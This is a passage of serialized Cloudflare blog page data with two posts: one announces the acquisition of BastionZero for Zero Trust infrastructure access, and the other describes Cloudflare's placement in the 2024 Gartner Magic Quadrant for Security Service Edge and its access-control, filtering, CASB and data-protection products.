defense-in-depth strategy. However, this leads to significantly more cost and management overhead for IT security teams and sometimes complicates challenges related to least-privileged access. Tools like bastion hosts or PAM solutions end up eroding least-privilege over time because policies expand, change, or drift from a company’s security stance. This leads to users incorrectly retaining access to sensitive infrastructure.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-bastionzero-fits-in\">How BastionZero fits in</h2>\n <a href=\"#how-bastionzero-fits-in\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>While our goal for years has been to help organizations of any size replace their VPNs as simply and quickly as possible, BastionZero expands the scope of Cloudflare’s VPN replacement solution beyond apps and networks to provide the same level of simplicity for extending Zero Trust controls to infrastructure resources. This helps security teams centralize the management of even more of their hybrid IT environment, while using standard Zero Trust practices to keep DevOps teams productive and secure. Together, Cloudflare and BastionZero can help organizations replace not only VPNs but also bastion hosts; SSH, Kubernetes, or database key management systems; and redundant PAM solutions.</p><p>BastionZero provides native integration to major infrastructure access protocols and targets like SSH, RDP, Kubernetes, database servers, and more to ensure that a target resource is configured to accept connections for that specific user, instead of relying on network level controls. This allows administrators to think in terms of resources and targets, not IP addresses and ports. Additionally, BastionZero is built on <a href=\"https://github.com/openpubkey/openpubkey\">OpenPubkey</a>, an open source library that binds identities to cryptographic keys using OpenID Connect (OIDC). With OpenPubkey, SSO can be used to grant access to infrastructure. BastionZero uses multiple roots of trust to ensure that your SSO does not become a single point of compromise for your critical servers and other infrastructure.</p><p>BastionZero will add the following capabilities to Cloudflare’s SASE platform:</p><ul><li><p><b>The elimination of long-lived keys/credentials</b> through frictionless infrastructure privileged access management (PAM) capabilities that modernize credential management (e.g., SSH keys, kubeconfig files, database passwords) through a new ephemeral, decentralized approach.</p></li><li><p><b>A DevOps-based approach for securing SSH connections</b> to support least privilege access that records sessions and logs every command for better visibility to support compliance requirements. Teams can operate in terms of auto-discovered targets, not IP addresses or networks, as they define just-in-time access policies and automate workflows.</p></li><li><p><b>Clientless RDP</b> to support access to desktop environments without the overhead and hassle of installing a client on a user’s device.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-next-for-bastionzero\">What’s next for BastionZero</h2>\n <a href=\"#whats-next-for-bastionzero\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The BastionZero team will be focused on integrating their infrastructure access controls directly into Cloudflare One. During the third and fourth quarters of this year, we will be announcing a number of new features to facilitate Zero Trust infrastructure access via Cloudflare One. All functionality delivered this year will be included in the Cloudflare One free tier for organizations with less than 50 users. We believe that everyone should have access to world-class security controls.</p><p>We are looking for early beta testers and teams to provide feedback about what they would like to see with respect to infrastructure access. If you are interested in learning more, please sign up <a href=\"http://cloudflare.com/lp/infrastructure-access\">here</a>.</p>"],"published_at":[0,"2024-05-30T13:12:02.000+01:00"],"updated_at":[0,"2024-10-09T23:28:20.452Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/30yvQCsZWvzikwePL2FhOP/2bb42593f7b6334d92c7856f7ec71f36/cloudflare-acquires-bastionzero.png"],"tags":[1,[[0,{"id":[0,"013htAspXBEMdE76Afcyq2"],"name":[0,"Acquisitions"],"slug":[0,"acquisitions"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"6Mp7ouACN2rT3YjL1xaXJx"],"name":[0,"Security"],"slug":[0,"security"]}],[0,{"id":[0,"6c9EM6c5poinGKIR6xldFo"],"name":[0,"Cloudflare Access"],"slug":[0,"cloudflare-access"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"5OywGP63AdM9Umyvaku8OP"],"name":[0,"Connectivity Cloud"],"slug":[0,"connectivity-cloud"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Kenny Johnson"],"slug":[0,"kenny"],"bio":[0,"Cloudflare Zero Trust PM\nAustin TX"],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4sLNWTlos4CkLxMZ9WzkKg/f0435153a94adcf13569842c86dfeabb/kenny.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,"@KennyJohnsonATX"],"facebook":[0,null]}],[0,{"name":[0,"Michael Keane"],"slug":[0,"michael-keane"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7AgGlX4fAKbcleNYCthPeh/399c46444fe39e400cec4eabed2c35f6/michael-keane.jpg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"We’re excited to announce that BastionZero, a Zero Trust infrastructure access platform, has joined Cloudflare. This acquisition extends our Zero Trust Network Access (ZTNA) flows with native access management for infrastructure like servers, Kubernetes clusters, and databases."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Cloudflare acquires BastionZero to extend Zero Trust access to IT infrastructure Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/cloudflare-acquires-bastionzero"],"metadata":[0,{"title":[0,"Cloudflare acquires BastionZero to extend Zero Trust access to IT infrastructure"],"description":[0,"We’re excited to announce that BastionZero, a Zero Trust infrastructure access platform, has joined Cloudflare. This acquisition extends our Zero Trust Network Access (ZTNA) flows with native access management for infrastructure like servers, Kubernetes clusters, and databases."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/174xnU5uc7pHMyHdMWCIFu/44f7d45680e26ac068393bec4bb936eb/cloudflare-acquires-bastionzero-CeFsWq.png"]}]}],[0,{"id":[0,"74GVTMXQHRWPaBWcm9NRgX"],"title":[0,"Cloudflare named in 2024 Gartner® Magic Quadrant™ for Security Service Edge"],"slug":[0,"cloudflare-sse-gartner-magic-quadrant-2024"],"excerpt":[0,"Gartner has once again named Cloudflare to the Gartner® Magic Quadrant™ for Security Service Edge (SSE) report"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/662cBI3NCcvlyl0OjiQzEv/96500a36f1f589e28d4de5b528feed72/image1-18.png\" alt=\"Cloudflare named in 2024 Gartner® Magic Quadrant™ for Security Service Edge\" class=\"kg-image\" width=\"1999\" height=\"1549\" loading=\"lazy\"/>\n \n </figure><p>Gartner has once again named Cloudflare to the Gartner® Magic Quadrant™ for Security Service Edge (SSE) report<sup>1</sup>. We are excited to share that Cloudflare is one of only ten vendors recognized in this report. For the second year in a row, we are recognized for our ability to execute and the completeness of our vision. You can read more about our position in the report <a href=\"https://www.cloudflare.com/lp/gartner-magic-quadrant-sse-2024/\">here</a>.</p><p><a href=\"/cloudflare-sse-gartner-magic-quadrant\">Last year</a>, we became the only new vendor named in the 2023 Gartner® Magic Quadrant™ for SSE. We did so in the shortest amount of time as measured by the date since our first product launched. We also <a href=\"/cloudflare-sse-gartner-magic-quadrant#:~:text=bot%20management.-,What%E2%80%99s%20next%3F,-When%20customers%20choose\">made a commitment</a> to our customers at that time that we would only build faster. We are happy to report back on the impact that has had on customers and the Gartner recognition of their feedback.</p><p>Cloudflare can bring capabilities to market quicker, and with greater cost efficiency, than competitors thanks to the investments we have made in our global network over the last 14 years. We believe we were able to become the only new vendor in 2023 by combining existing advantages like our robust, multi-use global proxy, our lightning-fast DNS resolver, our serverless compute platform, and our ability to reliably route and accelerate traffic around the world.</p><p>We believe we advanced further in the SSE market over the last year by building on the strength of that network as larger customers adopted <a href=\"https://www.cloudflare.com/zero-trust/\">Cloudflare One</a>. We took the ability of our Web Application Firewall (WAF) to scan for attacks without compromising speed and applied that to our now comprehensive Data Loss Prevention (DLP) approach. We repurposed the tools that we use to measure our own network and delivered an increasingly mature Digital Experience Monitoring (DEX) suite for administrators. And we extended our Cloud Access Security Broker (CASB) toolset to scan more applications for new types of data.</p><p>We are grateful to the customers who have trusted us on this journey so far, and we are especially proud of our customer reviews in the Gartner® Peer Insights™ panel as those customers report back on their experience with Cloudflare One. The feedback has been so consistently positive that Gartner named Cloudflare a <a href=\"https://www.gartner.com/reviews/market/zero-trust-network-access/vendor/cloudflare/product/cloudflare-access\">Customers’ Choice</a><sup>2</sup> for 2024. We are going to make the same commitment to you today that we made in 2023: Cloudflare will only build faster as we continue to build out the industry’s best SSE platform.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"what-is-a-security-service-edge\">What is a Security Service Edge?</h2>\n <a href=\"#what-is-a-security-service-edge\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>A <a href=\"https://www.cloudflare.com/learning/access-management/security-service-edge-sse/\">Security Service Edge (SSE)</a> “secures access to the web, cloud services and private applications. Capabilities include access control, threat protection, data security, security monitoring, and acceptable-use control enforced by network-based and API-based integration. SSE is primarily delivered as a cloud-based service, and may include on-premises or agent-based components.”<sup>3</sup></p><p>The SSE solutions in the market began to take shape as companies dealt with users, devices, and data leaving their security perimeters at scale. In previous generations, teams could keep their organization safe by hiding from the rest of the world behind a figurative castle-and-moat. The firewalls that protected their devices and data sat inside the physical walls of their space. The applications their users needed to reach sat on the same intranet. When users occasionally left the office they dealt with the hassle of backhauling their traffic through a legacy <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-vpn/\">virtual private network (VPN)</a> client.</p><p>This concept started to fall apart when applications left the building. SaaS applications offered a cheaper, easier alternative to self-hosting your resources. The cost and time savings drove IT departments to migrate and security teams had to play catch up as all of their most sensitive data also migrated.</p><p>At the same time, users began working away from the office more often. The rarely used VPN infrastructure inside an office suddenly struggled to stay afloat with the new demands from more users connecting to more of the Internet.</p><p>As a result, the band-aid boxes in an organization failed — in some cases slowly and in other situations all at once. SSE vendors offer a cloud-based answer. SSE providers operate their own security services from their own data centers or on a public cloud platform. Like the SaaS applications that drove the first wave of migration, these SSE services are maintained by the vendor and scale in a way that offers budget savings. The end user experience improves by avoiding the backhaul and security administrators can more easily build smarter, safer policies to defend their team.</p><p>The SSE space covers a broad category. If you ask five security teams what an SSE or <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust</a> solution is, you’ll probably get six answers. In general, SSE provides a helpful framing that gives teams guard rails as they try to adopt a Zero Trust architecture. The concept breaks down into a few typical buckets:</p><ul><li><p><b>Zero Trust Access Control</b>: protect applications that hold sensitive data by creating least-privilege rules that check for identity and other contextual signals on each and every request or connection.</p></li><li><p><b>Outbound Filtering</b>: keep users and devices safe as they connect to the rest of the Internet by filtering and logging DNS queries, HTTP requests, or even network-level traffic.</p></li><li><p><b>Secure SaaS Usage</b>: analyze traffic to SaaS applications and scan the data sitting inside of SaaS applications for potential Shadow IT policy violations, misconfigurations, or data mishandling.</p></li><li><p><b>Data Protection</b>: scan for data leaving your organization or for destinations that do not comply with your organization’s policies. Find data stored inside your organization, even in trusted tools, that should not be retained or needs tighter access controls.</p></li><li><p><b>Employee Experience</b>: monitor and improve the experience that your team members have when using tools and applications on the Internet or hosted inside your own organization.</p></li></ul><p>The SSE space is a component of the larger <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\">Secure Access Service Edge (SASE)</a> market. You can think of the SSE capabilities as the security half of SASE while the other half consists of the networking technologies that connect users, offices, applications, and data centers. Some vendors only focus on the SSE side and rely on partners to connect customers to their security solutions. Other companies just provide the networking pieces. While today’s announcement highlights our SSE capabilities, Cloudflare offers both components as a comprehensive, <a href=\"/single-vendor-sase-announcement-2024\">single-vendor SASE</a> provider.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-does-cloudflare-one-fit-into-the-sse-space\">How does Cloudflare One fit into the SSE space?</h2>\n <a href=\"#how-does-cloudflare-one-fit-into-the-sse-space\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Customers can rely on Cloudflare to solve the entire range of security problems represented by the SSE category. They also can just start with a single component. We know that an entire “digital transformation” can be an overwhelming prospect for any organization. While all the use cases below work better together, we make it simple for teams to start by just solving one problem at a time.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"zero-trust-access-control\">Zero Trust access control</h3>\n <a href=\"#zero-trust-access-control\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Most organizations begin that problem-solving journey by attacking their virtual private network (VPN). In many cases, a legacy VPN operates in a model where anyone on that private network is trusted by default to access anything else. The applications and data sitting on that network become vulnerable to any user who can connect. Augmenting or replacing legacy VPNs is one of the leading Zero Trust use cases we see customers adopting, in part to eliminate pains related to the ongoing series of high-impact VPN <a href=\"https://www.cisa.gov/news-events/alerts/2024/04/12/palo-alto-networks-releases-guidance-vulnerability-pan-os-cve-2024-3400\">vulnerabilities</a> in on-premises firewalls and gateways.</p><p>Cloudflare provides teams with the ability to build Zero Trust rules that replace the security model of a traditional VPN with one that evaluates every request and connection for trust signals like identity, device posture, location, and multifactor authentication method. Through <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">Zero Trust Network Access (ZTNA)</a>, administrators can make applications available to employees and third-party contractors through a fully clientless option that makes traditional tools feel just like SaaS applications. Teams that need more of a private network can still build one on Cloudflare that supports arbitrary TCP, UDP, and ICMP traffic, including <a href=\"/introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2\">bidirectional traffic</a>, while still enforcing Zero Trust rules.</p><p>Cloudflare One can also apply these rules to the applications that sit outside your infrastructure. You can deploy Cloudflare’s identity proxy to enforce consistent and granular policies that determine how team members log into their SaaS applications, as well.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"dns-filtering-and-secure-web-gateway-capabilities\">DNS filtering and Secure Web Gateway capabilities</h3>\n <a href=\"#dns-filtering-and-secure-web-gateway-capabilities\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare operates the world’s fastest DNS resolver, helping users connect safely to the Internet whether they are working from a coffee shop or operating inside some of the <a href=\"/helping-keep-governments-safe-and-secure/\">world’s largest networks</a>.</p><p>Beyond just <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dns-filtering/\">DNS filtering</a>, Cloudflare also provides organizations with a comprehensive <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/\">Secure Web Gateway (SWG)</a> that inspects the HTTP traffic leaving a device or entire network. Cloudflare filters each request for dangerous destinations or potentially malicious downloads. Besides SSE use cases, Cloudflare operates one of the largest forward proxies in the world for Internet privacy used by Apple iCloud Private Relay, Microsoft Edge Secure Network, and beyond.</p><p>You can also mix-and-match how you want to send traffic to Cloudflare. Your team can decide to send all traffic from every mobile device or just plug in your office or data center network to Cloudflare’s network. Each request or DNS query is logged and made available for review in our dashboard or can be exported to a 3rd party logging solution.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"in-line-and-at-rest-casb\">In-line and at-rest CASB</h3>\n <a href=\"#in-line-and-at-rest-casb\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>SaaS applications relieve IT teams of the burden to host, maintain, and monitor the tools behind their business. They also create entirely new headaches for corresponding security teams.</p><p>Any user in an enterprise now needs to connect to an application on the public Internet to do their work, and some users prefer to use their favorite application rather than the ones vetted and approved by the IT department. This kind of <a href=\"https://www.cloudflare.com/learning/access-management/what-is-shadow-it/\">Shadow IT</a> infrastructure can lead to surprise fees, compliance violations, and data loss.</p><p>Cloudflare offers comprehensive scanning and filtering to detect when team members are using unapproved tools. With a single click, administrators can block those tools outright or control how those applications can be used. If your marketing team needs to use Google Drive to collaborate with a vendor, you can apply a quick rule that makes sure they can only download files and never upload. Alternatively, allow users to visit an application and read from it while blocking all text input. Cloudflare’s Shadow IT policies offer easy-to-deploy controls over how your organization uses the Internet.</p><p>Beyond unsanctioned applications, even approved resources can cause trouble. Your organization might rely on Microsoft OneDrive for day-to-day work, but your compliance policies prohibit your HR department from storing files with employee Social Security numbers in the tool. Cloudflare’s <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-casb/\">Cloud Access Security Broker (CASB)</a> can routinely scan the SaaS applications your team relies on to detect improper usage, missing controls, or potential misconfiguration.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"digital-experience-monitoring\">Digital Experience Monitoring</h3>\n <a href=\"#digital-experience-monitoring\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Enterprise users have consumer expectations about how they connect to the Internet. When they encounter delays or latency, they turn to IT help desks to complain. Those complaints only get louder when help desks lack the proper tools to granularly understand or solve the issues.</p><p>Cloudflare One provides teams with a <a href=\"https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/\">Digital Experience Monitoring</a> toolkit that we built based on the tools we have used for years inside of Cloudflare to monitor our own global network. Administrators can measure global, regional, or individual latency to applications on the Internet. IT teams can open our dashboard to troubleshoot connectivity issues with single users. The same capabilities we use to <a href=\"https://w3techs.com/technologies/overview/proxy\">proxy approximately 20% of the web</a> are now available to teams of any size, so they can help their users.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"data-security\">Data security</h3>\n <a href=\"#data-security\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The most pressing concern we have heard from CIOs and CISOs over the last year is the fear around data protection. Whether data loss is malicious or accidental, the consequences can erode customer trust and create penalties for the business.</p><p>We also hear that deploying any sort of effective data security is just plain hard. Customers tell us anecdotes about expensive point solutions they purchased with the intention to implement them quickly and keep data safe, that ultimately just didn’t work or slowed down their teams to the point that they became shelfware.</p><p>We have spent the last year aggressively improving our solution to that problem as the single largest focus area of investment in the Cloudflare One team. Our data security portfolio, including <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\">data loss prevention (DLP)</a>, can now scan for data leaving your organization, as well as data stored inside your SaaS applications, and prevent loss based on exact data matches that you provide or through fuzzier patterns. Teams can apply optical character recognition (OCR) to find potential loss in images, scan for public cloud keys in a single click, and software companies can rely on predefined ML-based source code detections.</p><p>Data security will continue to be our largest area of focus in Cloudflare One over the next year. We are excited to continue to deliver an SSE platform that gives administrators comprehensive control without interrupting or slowing down their users.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"beyond-the-sse\">Beyond the SSE</h3>\n <a href=\"#beyond-the-sse\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The scope of an SSE solution captures a wide range of the security problems that plague enterprises. We also know that issues beyond that definition can compromise a team. In addition to offering an industry-leading SSE platform, Cloudflare gives your team a <a href=\"https://www.cloudflare.com/cybersecurity/\">full range of cybersecurity tools</a> to protect your organization, to connect your team, and to secure all of your applications.</p><p>IT compromise tends to start with email. The majority of attacks begin with some kind of multi-channel <a href=\"https://www.cloudflare.com/learning/access-management/phishing-attack/\">phishing</a> campaign or social engineering attack sent to the largest hole in any organization’s perimeter: their employees’ email inboxes. We believe that you should be protected from that too, even before the layers of our SSE platform kick in to catch malicious links or files from those emails, so Cloudflare One also features best-in-class cloud <a href=\"https://www.cloudflare.com/learning/email-security/what-is-email-security/\">email security</a>. The capabilities just work with the rest of Cloudflare One to help stop all phishing channels — inbox (cloud email security), social media (SWG), SMS (ZTNA <a href=\"/2022-07-sms-phishing-attacks/\">together with hard keys</a>), and cloud collaboration (CASB). For example, you can allow team members to still click on potentially malicious links in an email while forcing those destinations to load in an isolated browser that is transparent to the 